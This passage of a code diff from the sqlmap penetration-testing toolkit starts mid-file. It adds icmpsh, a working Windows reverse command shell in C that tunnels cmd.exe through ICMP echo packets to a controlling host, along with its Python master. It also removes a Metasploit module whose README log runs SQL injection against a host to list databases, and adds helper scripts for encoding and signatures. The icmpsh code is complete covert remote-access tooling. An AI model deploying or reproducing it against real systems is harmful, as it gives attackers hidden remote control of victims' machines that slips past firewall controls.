+#define DEFAULT_MAX_BLANKS	   	    10
+#define DEFAULT_MAX_DATA_SIZE	    64
+
+FARPROC icmp_create, icmp_send, to_ip;
+
+int verbose = 0;
+
+int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)
+{
+	SECURITY_ATTRIBUTES sattr;
+	STARTUPINFOA si;
+	HANDLE in_read, out_write;
+
+	memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));
+	memset(pi, 0x00, sizeof(PROCESS_INFORMATION));
+    
+	// create communication pipes  
+	memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));
+	sattr.nLength = sizeof(SECURITY_ATTRIBUTES); 
+	sattr.bInheritHandle = TRUE; 
+	sattr.lpSecurityDescriptor = NULL; 
+
+	if (!CreatePipe(out_read, &out_write, &sattr, 0)) {
+		return STATUS_PROCESS_NOT_CREATED;
+	}
+	if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {
+		return STATUS_PROCESS_NOT_CREATED;
+	}
+
+	if (!CreatePipe(&in_read, in_write, &sattr, 0)) {
+		return STATUS_PROCESS_NOT_CREATED;
+	}
+	if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {
+		return STATUS_PROCESS_NOT_CREATED;
+	}
+
+	// spawn process
+	memset(&si, 0x00, sizeof(STARTUPINFO));
+	si.cb = sizeof(STARTUPINFO); 
+	si.hStdError = out_write;
+	si.hStdOutput = out_write;
+	si.hStdInput = in_read;
+	si.dwFlags |= STARTF_USESTDHANDLES;
+
+	if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {
+		return STATUS_PROCESS_NOT_CREATED;
+	}
+
+	CloseHandle(out_write);
+	CloseHandle(in_read);
+
+	return STATUS_OK;
+}
+
+void usage(char *path)
+{
+	printf("%s [options] -t target\n", path);
+	printf("options:\n");
+	printf("  -t host            host ip address to send ping requests to\n");
+	printf("  -r                 send a single test icmp request and then quit\n");
+	printf("  -d milliseconds    delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY);
+	printf("  -o milliseconds    timeout in milliseconds\n");
+	printf("  -h                 this screen\n");
+	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
+    printf("                     before quitting\n");
+	printf("  -s bytes           maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
+	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
+    printf("increase the size (-s) of the data buffer\n");
+}
+
+void create_icmp_channel(HANDLE *icmp_chan)
+{
+	// create icmp file
+	*icmp_chan = (HANDLE) icmp_create();
+}
+
+int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)
+{
+	int rs;
+	char *temp_in_buf;
+	int nbytes;
+
+	PICMP_ECHO_REPLY echo_reply;
+
+	temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);
+	if (!temp_in_buf) {
+		return TRANSFER_FAILURE;
+	}
+
+	// send data to remote host
+	rs = icmp_send(
+			icmp_chan,
+			target,
+			out_buf,
+			out_buf_size,
+			NULL,
+			temp_in_buf,
+			max_in_data_size + ICMP_HEADERS_SIZE,
+			timeout);
+
+		// check received data
+		if (rs > 0) {
+			echo_reply = (PICMP_ECHO_REPLY) temp_in_buf;
+			if (echo_reply->DataSize > max_in_data_size) {
+				nbytes = max_in_data_size;
+			} else {
+				nbytes = echo_reply->DataSize;
+			}
+			memcpy(in_buf, echo_reply->Data, nbytes);
+			*in_buf_size = nbytes;
+
+			free(temp_in_buf);
+			return TRANSFER_SUCCESS;
+		}
+
+		free(temp_in_buf);
+
+    return TRANSFER_FAILURE;
+}
+
+int load_deps()
+{
+	HMODULE lib;
+	
+	lib = LoadLibraryA("ws2_32.dll");
+	if (lib != NULL) {
+        to_ip = GetProcAddress(lib, "inet_addr");
+        if (!to_ip) {   
+            return 0;
+        }
+    }
+
+	lib = LoadLibraryA("iphlpapi.dll");
+	if (lib != NULL) {
+		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
+		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
+		if (icmp_create && icmp_send) {
+			return 1;
+		}
+	} 
+
+	lib = LoadLibraryA("ICMP.DLL");
+	if (lib != NULL) {
+		icmp_create = GetProcAddress(lib, "IcmpCreateFile");
+		icmp_send = GetProcAddress(lib, "IcmpSendEcho");
+		if (icmp_create && icmp_send) {
+			return 1;
+		}
+	}
+	
+	printf("failed to load functions (%u)", GetLastError());
+
+	return 0;
+}
+int main(int argc, char **argv)
+{
+	int opt;
+	char *target;
+	unsigned int delay, timeout;
+	unsigned int ip_addr;
+	HANDLE pipe_read, pipe_write;
+	HANDLE icmp_chan;
+	unsigned char *in_buf, *out_buf;
+	unsigned int in_buf_size, out_buf_size;
+	DWORD rs;
+	int blanks, max_blanks;
+	PROCESS_INFORMATION pi;
+	int status;
+	unsigned int max_data_size;
+	struct hostent *he;
+
+
+	// set defaults
+	target = 0;
+	timeout = DEFAULT_TIMEOUT;
+	delay = DEFAULT_DELAY;
+	max_blanks = DEFAULT_MAX_BLANKS;
+	max_data_size = DEFAULT_MAX_DATA_SIZE;
+
+	status = STATUS_OK;
+	if (!load_deps()) {
+		printf("failed to load ICMP library\n");
+		return -1;
+	}
+
+	// parse command line options
+	for (opt = 1; opt < argc; opt++) {
+		if (argv[opt][0] == '-') {
+			switch(argv[opt][1]) {
+				case 'h':
+				    usage(*argv);
+					return 0;
+				case 't':
+					if (opt + 1 < argc) {
+						target = argv[opt + 1];
+					}
+					break;
+				case 'd':
+					if (opt + 1 < argc) {
+						delay = atol(argv[opt + 1]);
+					}
+					break;
+				case 'o':
+					if (opt + 1 < argc) {
+						timeout = atol(argv[opt + 1]);
+					}
+					break;
+				case 'r':
+					status = STATUS_SINGLE;
+					break;
+				case 'b':
+					if (opt + 1 < argc) {
+						max_blanks = atol(argv[opt + 1]);
+					}
+					break;
+				case 's':
+					if (opt + 1 < argc) {
+						max_data_size = atol(argv[opt + 1]);
+					}
+					break;
+				default:
+					printf("unrecognized option -%c\n", argv[1][0]);
+					usage(*argv);
+					return -1;
+			}
+		}
+	}
+
+	if (!target) {
+		printf("you need to specify a host with -t. Try -h for more options\n");
+		return -1;
+	}
+	ip_addr = to_ip(target);
+
+	// don't spawn a shell if we're only sending a single test request
+	if (status != STATUS_SINGLE) {
+		status = spawn_shell(&pi, &pipe_read, &pipe_write);
+	}
+
+	// create icmp channel
+	create_icmp_channel(&icmp_chan);
+	if (icmp_chan == INVALID_HANDLE_VALUE) {
+	    printf("unable to create ICMP file: %u\n", GetLastError());
+	    return -1;
+	}
+
+	// allocate transfer buffers
+	in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
+	out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);
+	if (!in_buf || !out_buf) {
+		printf("failed to allocate memory for transfer buffers\n");
+		return -1;
+	}
+	memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
+	memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);
+
+	// sending/receiving loop
+	blanks = 0;
+	do {
+
+		switch(status) {
+			case STATUS_SINGLE:
+				// reply with a static string
+				out_buf_size = sprintf(out_buf, "Test1234\n");
+				break;
+			case STATUS_PROCESS_NOT_CREATED:
+				// reply with error message
+				out_buf_size = sprintf(out_buf, "Process was not created\n");
+				break;
+			default:
+				// read data from process via pipe
+				out_buf_size = 0;
+				if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {
+					if (out_buf_size > 0) {
+						out_buf_size = 0;
+						rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);
+						if (!rs && GetLastError() != ERROR_IO_PENDING) {
+							out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError());
+						} 
+					}
+				} else {
+					out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError());
+				}
+				break;
+		}
+
+		// send request/receive response
+		if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size,  max_data_size, timeout) == TRANSFER_SUCCESS) {
+			if (status == STATUS_OK) {
+				// write data from response back into pipe
+				WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);
+			}
+			blanks = 0;
+		} else {
+			// no reply received or error occured
+			blanks++;
+		}
+
+		// wait between requests
+		Sleep(delay);
+
+	} while (status == STATUS_OK && blanks < max_blanks);
+
+	if (status == STATUS_OK) {
+		TerminateProcess(pi.hProcess, 0);
+	}
+
+    return 0;
+}
+

extra/icmpsh/icmpsh_m.py

@@ -0,0 +1,138 @@
+#!/usr/bin/env python
+#
+#  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
+#  Perl by Nico Leidecker <nico@leidecker.info>)
+#
+#  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
+#
+#
+#  This program is free software: you can redistribute it and/or modify
+#  it under the terms of the GNU General Public License as published by
+#  the Free Software Foundation, either version 3 of the License, or
+#  (at your option) any later version.
+#
+#  This program is distributed in the hope that it will be useful,
+#  but WITHOUT ANY WARRANTY; without even the implied warranty of
+#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#  GNU General Public License for more details.
+#
+#  You should have received a copy of the GNU General Public License
+#  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+import os
+import select
+import socket
+import subprocess
+import sys
+
+def setNonBlocking(fd):
+    """
+    Make a file descriptor non-blocking
+    """
+
+    import fcntl
+
+    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
+    flags = flags | os.O_NONBLOCK
+    fcntl.fcntl(fd, fcntl.F_SETFL, flags)
+
+def main(src, dst):
+    if subprocess.mswindows:
+        sys.stderr.write('icmpsh master can only run on Posix systems\n')
+        sys.exit(255)
+
+    try:
+        from impacket import ImpactDecoder
+        from impacket import ImpactPacket
+    except ImportError:
+        sys.stderr.write('You need to install Python Impacket library first\n')
+        sys.exit(255)
+
+    # Make standard input a non-blocking file
+    stdin_fd = sys.stdin.fileno()
+    setNonBlocking(stdin_fd)
+
+    # Open one socket for ICMP protocol
+    # A special option is set on the socket so that IP headers are included
+    # with the returned data
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
+    except socket.error:
+        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
+        sys.exit(1)
+
+    sock.setblocking(0)
+    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+
+    # Create a new IP packet and set its source and destination addresses
+    ip = ImpactPacket.IP()
+    ip.set_ip_src(src)
+    ip.set_ip_dst(dst)
+
+    # Create a new ICMP packet of type ECHO REPLY
+    icmp = ImpactPacket.ICMP()
+    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
+
+    # Instantiate an IP packets decoder
+    decoder = ImpactDecoder.IPDecoder()
+
+    while True:
+        cmd = ''
+
+        # Wait for incoming replies
+        if sock in select.select([ sock ], [], [])[0]:
+            buff = sock.recv(4096)
+
+            if 0 == len(buff):
+                # Socket remotely closed
+                sock.close()
+                sys.exit(0)
+
+            # Packet received; decode and display it
+            ippacket = decoder.decode(buff)
+            icmppacket = ippacket.child()
+
+            # If the packet matches, report it to the user
+            if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
+                # Get identifier and sequence number
+                ident = icmppacket.get_icmp_id()
+                seq_id = icmppacket.get_icmp_seq()
+                data = icmppacket.get_data_as_string()
+
+                if len(data) > 0:
+                    sys.stdout.write(data)
+
+                # Parse command from standard input
+                try:
+                    cmd = sys.stdin.readline()
+                except:
+                    pass
+
+                if cmd == 'exit\n':
+                    return
+
+                # Set sequence number and identifier
+                icmp.set_icmp_id(ident)
+                icmp.set_icmp_seq(seq_id)
+
+                # Include the command as data inside the ICMP packet
+                icmp.contains(ImpactPacket.Data(cmd))
+
+                # Calculate its checksum
+                icmp.set_icmp_cksum(0)
+                icmp.auto_checksum = 1
+
+                # Have the IP packet contain the ICMP packet (along with its payload)
+                ip.contains(icmp)
+
+                # Send it to the target host
+                sock.sendto(ip.get_packet(), (dst, 0))
+
+if __name__ == '__main__':
+    if len(sys.argv) < 3:
+        msg = 'missing mandatory options. Execute as root:\n'
+        msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
+        sys.stderr.write(msg)
+        sys.exit(1)
+
+    main(sys.argv[1], sys.argv[2])

extra/msfauxmod/README.txt

@@ -1,78 +0,0 @@
-To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
-the example below.
-
-Note that if you are willing to run Metasploit's sqlmap auxiliary module on
-through WMAP framework you first need to install sqlmap on your system or
-add its file system path to the PATH environment variable.
-
-
-$ ./msfconsole
-
-                _                  _       _ _
-               | |                | |     (_) |
- _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
-| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
-| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
-|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
-                            | |
-                            |_|
-
-
-       =[ msf v3.2-testing
-+ -- --=[ 308 exploits - 173 payloads
-+ -- --=[ 20 encoders - 6 nops
-       =[ 75 aux
-
-msf > use auxiliary/scanner/http/wmap_sqlmap 
-msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
-RHOSTS => 192.168.1.121
-msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
-PATH => /sqlmap/mysql/get_int.php
-msf auxiliary(wmap_sqlmap) > set QUERY id=1
-QUERY => id=1
-msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
-OPTS => --dbs --current-user
-msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
-msf auxiliary(wmap_sqlmap) > show options 
-
-Module options:
-
-   Name         Current Setting                                                 Required  Description                                          
-   ----         ---------------                                                 --------  -----------                                          
-   BATCH        true                                                            yes       Never ask for user input, use the default behaviour  
-   BODY                                                                         no        The data string to be sent through POST              
-   METHOD       GET                                                             yes       HTTP Method                                          
-   OPTS         --dbs --current-user                                            no        The sqlmap options to use                            
-   PATH         /sqlmap/mysql/get_int.php                                       yes       The path/file to test for SQL injection              
-   Proxies                                                                      no        Use a proxy chain                                    
-   QUERY        id=1                                                            no        HTTP GET query                                       
-   RHOSTS       192.168.1.121                                                   yes       The target address range or CIDR identifier          
-   RPORT        80                                                              yes       The target port                                      
-   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py             yes       The sqlmap >= 0.6.1 full path                        
-   SSL          false                                                           no        Use SSL                                              
-   THREADS      1                                                               yes       The number of concurrent threads                     
-   VHOST                                                                        no        HTTP server virtual host                             
-
-msf auxiliary(wmap_sqlmap) > run
-[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
-SQLMAP: 
-SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
-SQLMAP: 
-SQLMAP: [*] starting at: 16:23:19
-SQLMAP: 
-SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-SQLMAP: back-end DBMS:  MySQL >= 5.0.0
-SQLMAP: 
-SQLMAP: current user:    'testuser@localhost'
-SQLMAP: 
-SQLMAP: available databases [3]:
-SQLMAP: [*] information_schema
-SQLMAP: [*] mysql
-SQLMAP: [*] test
-SQLMAP: 
-SQLMAP: 
-SQLMAP: [*] shutting down at: 16:23:21
-SQLMAP: 
-[*] Auxiliary module execution completed
-msf auxiliary(wmap_sqlmap) > 

extra/msfauxmod/wmap_sqlmap.rb

@@ -1,95 +0,0 @@
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Auxiliary
-
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::WMAPScanUniqueQuery
-	include Msf::Auxiliary::Scanner
-
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'			=> 'SQLMAP SQL Injection External Module',
-			'Description'	=> %q{
-				This module launch a sqlmap session.
-				sqlmap is an automatic SQL injection tool developed in Python.
-				Its goal is to detect and take advantage of SQL injection
-				vulnerabilities on web applications. Once it detects one
-				or more SQL injections on the target host, the user can
-				choose among a variety of options to perform an extensive
-				back-end database management system fingerprint, retrieve
-				DBMS session user and database, enumerate users, password
-				hashes, privileges, databases, dump entire or user
-				specific DBMS tables/columns, run his own SQL SELECT
-				statement, read specific files on the file system and much
-				more.
-			},
-			'Author'		=> [ 'bernardo.damele [at] gmail.com', 'daniele.bellucci [at] gmail.com' ],
-			'License'		=> BSD_LICENSE,
-			'Version'		=> '$Revision$',
-			'References'	=>
-				[
-					['URL', 'http://sqlmap.sourceforge.net'],
-				]
-			))
-		
-		register_options(
-			[
-				OptString.new('METHOD', [ true,  "HTTP Method", 'GET' ]),
-				OptString.new('PATH', [ true,  "The path/file to test for SQL injection", 'index.php' ]),
-				OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
-				OptString.new('BODY', [ false, "The data string to be sent through POST", '' ]),
-				OptString.new('OPTS', [ false,  "The sqlmap options to use", ' ' ]),
-				OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]), 
-				OptBool.new('BATCH', [ true,  "Never ask for user input, use the default behaviour", true ])
-			], self.class)
-	end
-	
-	# Modify to true if you have sqlmap installed.
-	def wmap_enabled
-		false
-	end
-
-	# Test a single host
-	def run_host(ip)
-			
-		sqlmap = datastore['SQLMAP_PATH'] 
-			
-		if not sqlmap
-			print_error("The sqlmap script could not be found")
-			return
-		end
-
-		data = datastore['BODY']
-		method = datastore['METHOD'].upcase
-
-		sqlmap_url  = (datastore['SSL'] ? "https" : "http")
-		sqlmap_url += "://" + self.target_host + ":" + datastore['RPORT']
-		sqlmap_url += "/" + datastore['PATH'] 
-
-		if method == "GET"
-			sqlmap_url += '?' + datastore['QUERY']
-		end
-
-		cmd  = sqlmap + ' -u \'' + sqlmap_url + '\''
-		cmd += ' --method ' + method
-		cmd += ' ' + datastore['OPTS']
-
-		if not data.empty?
-			cmd += ' --data \'' + data + '\''
-		end
-
-		if datastore['BATCH'] == true
-			cmd += ' --batch'
-		end
-
-		print_status("exec: #{cmd}")
-		IO.popen( cmd ) do |io|
-			io.each_line do |line|
-				print_line("SQLMAP: " + line.strip)
-			end
-		end
-	end
-
-end

extra/mssqlsig/update.py

@@ -0,0 +1,137 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import codecs
+import os
+import re
+import urllib2
+import urlparse
+
+from xml.dom.minidom import Document
+
+# Path to the XML file with signatures
+MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
+
+# Url to update Microsoft SQL Server XML versions file from
+MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
+
+def updateMSSQLXML():
+    if not os.path.exists(MSSQL_XML):
+        errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
+        print errMsg
+        return
+
+    infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
+    print infoMsg
+
+    try:
+        req = urllib2.Request(MSSQL_VERSIONS_URL)
+        f = urllib2.urlopen(req)
+        mssqlVersionsHtmlString = f.read()
+        f.close()
+    except urllib2.URLError:
+        __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
+        __mssqlHostname = __mssqlPath[1]
+
+        warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
+        warnMsg += " check your Internet connection and retry"
+        print warnMsg
+
+        return
+
+    releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M)
+    releasesCount = len(releases)
+
+    # Create the minidom document
+    doc = Document()
+
+    # Create the <root> base element
+    root = doc.createElement("root")
+    doc.appendChild(root)
+
+    for index in xrange(0, releasesCount):
+        release = releases[index]
+
+        # Skip Microsoft SQL Server 6.5 because the HTML
+        # table is in another format
+        if release == "6.5":
+            continue
+
+        # Create the <signatures> base element
+        signatures = doc.createElement("signatures")
+        signatures.setAttribute("release", release)
+        root.appendChild(signatures)
+
+        startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
+
+        if index == releasesCount - 1:
+            stopIdx = len(mssqlVersionsHtmlString)
+        else:
+            stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
+
+        mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
+        servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M)
+
+        for servicePack, version in servicepackVersion:
+            if servicePack.startswith(" "):
+                servicePack = servicePack[1:]
+            if "/" in servicePack:
+                servicePack = servicePack[:servicePack.index("/")]
+            if "(" in servicePack:
+                servicePack = servicePack[:servicePack.index("(")]
+            if "-" in servicePack:
+                servicePack = servicePack[:servicePack.index("-")]
+            if "*" in servicePack:
+                servicePack = servicePack[:servicePack.index("*")]
+            if servicePack.startswith("+"):
+                servicePack = "0%s" % servicePack
+
+            servicePack = servicePack.replace("\t", " ")
+            servicePack = servicePack.replace("No SP", "0")
+            servicePack = servicePack.replace("RTM", "0")
+            servicePack = servicePack.replace("TM", "0")
+            servicePack = servicePack.replace("SP", "")
+            servicePack = servicePack.replace("Service Pack", "")
+            servicePack = servicePack.replace("<a href=\"http:", "")
+            servicePack = servicePack.replace("  ", " ")
+            servicePack = servicePack.replace("+ ", "+")
+            servicePack = servicePack.replace(" +", "+")
+
+            if servicePack.endswith(" "):
+                servicePack = servicePack[:-1]
+
+            if servicePack and version:
+                # Create the main <card> element
+                signature = doc.createElement("signature")
+                signatures.appendChild(signature)
+
+                # Create a <version> element
+                versionElement = doc.createElement("version")
+                signature.appendChild(versionElement)
+
+                # Give the <version> elemenet some text
+                versionText = doc.createTextNode(version)
+                versionElement.appendChild(versionText)
+
+                # Create a <servicepack> element
+                servicepackElement = doc.createElement("servicepack")
+                signature.appendChild(servicepackElement)
+
+                # Give the <servicepack> elemenet some text
+                servicepackText = doc.createTextNode(servicePack)
+                servicepackElement.appendChild(servicepackText)
+
+    # Save our newly created XML to the signatures file
+    mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
+    doc.writexml(writer=mssqlXml, addindent="    ", newl="\n")
+    mssqlXml.close()
+
+    infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
+    print infoMsg
+
+if __name__ == "__main__":
+    updateMSSQLXML()

extra/runcmd/README.txt

@@ -1,7 +1,3 @@
 Files in this folder can be used to compile auxiliary program that can
 be used for running command prompt commands skipping standard "cmd /c" way. 
-They are licensed under the terms of the GNU Lesser General Public License 
-and it's compiled version is available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
+They are licensed under the terms of the GNU Lesser General Public License.

extra/safe2bin/README.txt

@@ -0,0 +1,17 @@
+To use safe2bin.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./safe2bin.py -i output.txt -o output.txt.bin
+
+This will create an binary decoded file output.txt.bin. For example, 
+if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will 
+be decoded to: "	test	234
+newline"
+
+If you skip the output file name, general rule is that the binary
+file names are suffixed with the string '.bin'. So, that means that 
+the upper example can also be written in the following form:
+
+$ python ./safe2bin.py -i output.txt

extra/safe2bin/__init__.py

@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+pass

extra/safe2bin/safe2bin.py

@@ -0,0 +1,130 @@
+#!/usr/bin/env python
+
+"""
+safe2bin.py - Simple safe(hex) to binary format converter
+
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import binascii
+import re
+import string
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+# Regex used for recognition of hex encoded characters
+HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
+
+# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n)
+SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
+
+# Characters that don't need to be safe encoded
+SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
+
+# Prefix used for hex encoded values
+HEX_ENCODED_PREFIX = r"\x"
+
+# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding)
+HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__"
+
+# String used for temporary marking of slash characters
+SLASH_MARKER = "__SLASH__"
+
+def safecharencode(value):
+    """
+    Returns safe representation of a given basestring value
+
+    >>> safecharencode(u'test123')
+    u'test123'
+    >>> safecharencode(u'test\x01\x02\xff')
+    u'test\\01\\02\\03\\ff'
+    """
+
+    retVal = value
+
+    if isinstance(value, basestring):
+        if any(_ not in SAFE_CHARS for _ in value):
+            retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
+            retVal = retVal.replace('\\', SLASH_MARKER)
+
+            for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
+                retVal = retVal.replace(char, repr(char).strip('\''))
+
+            retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
+
+            retVal = retVal.replace(SLASH_MARKER, "\\\\")
+            retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
+    elif isinstance(value, list):
+        for i in xrange(len(value)):
+            retVal[i] = safecharencode(value[i])
+
+    return retVal
+
+def safechardecode(value, binary=False):
+    """
+    Reverse function to safecharencode
+    """
+
+    retVal = value
+    if isinstance(value, basestring):
+        retVal = retVal.replace('\\\\', SLASH_MARKER)
+
+        while True:
+            match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
+            if match:
+                retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
+            else:
+                break
+
+        for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]:
+            retVal = retVal.replace(repr(char).strip('\''), char)
+
+        retVal = retVal.replace(SLASH_MARKER, '\\')
+
+        if binary:
+            if isinstance(retVal, unicode):
+                retVal = retVal.encode("utf8")
+
+    elif isinstance(value, (list, tuple)):
+        for i in xrange(len(value)):
+            retVal[i] = safechardecode(value[i])
+
+    return retVal
+
+def main():
+    usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
+    parser = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+
+    f = open(args.inputFile, 'r')
+    data = f.read()
+    f.close()
+
+    if not args.outputFile:
+        args.outputFile = args.inputFile + '.bin'
+
+    f = open(args.outputFile, 'wb')
+    f.write(safechardecode(data))
+    f.close()
+
+if __name__ == '__main__':
+    main()

extra/shellcodeexec/README.txt

@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/inquisb/shellcodeexec.

extra/shutils/blanks.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Removes trailing spaces from blank lines inside project files
+find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;

extra/shutils/duplicates.py

@@ -0,0 +1,27 @@
+#!/usr/bin/env python
+
+# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Removes duplicate entries in wordlist like files
+
+import sys
+
+if len(sys.argv) > 0:
+    items = list()
+
+    with open(sys.argv[1], 'r') as f:
+        for item in f.readlines():
+            item = item.strip()
+            try:
+                str.encode(item)
+                if item in items:
+                    if item:
+                        print item
+                else:
+                    items.append(item)
+            except:
+                pass
+
+    with open(sys.argv[1], 'w+') as f:
+        f.writelines("\n".join(items))

extra/shutils/pep8.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Runs pep8 on all python files (prerequisite: apt-get install pep8)
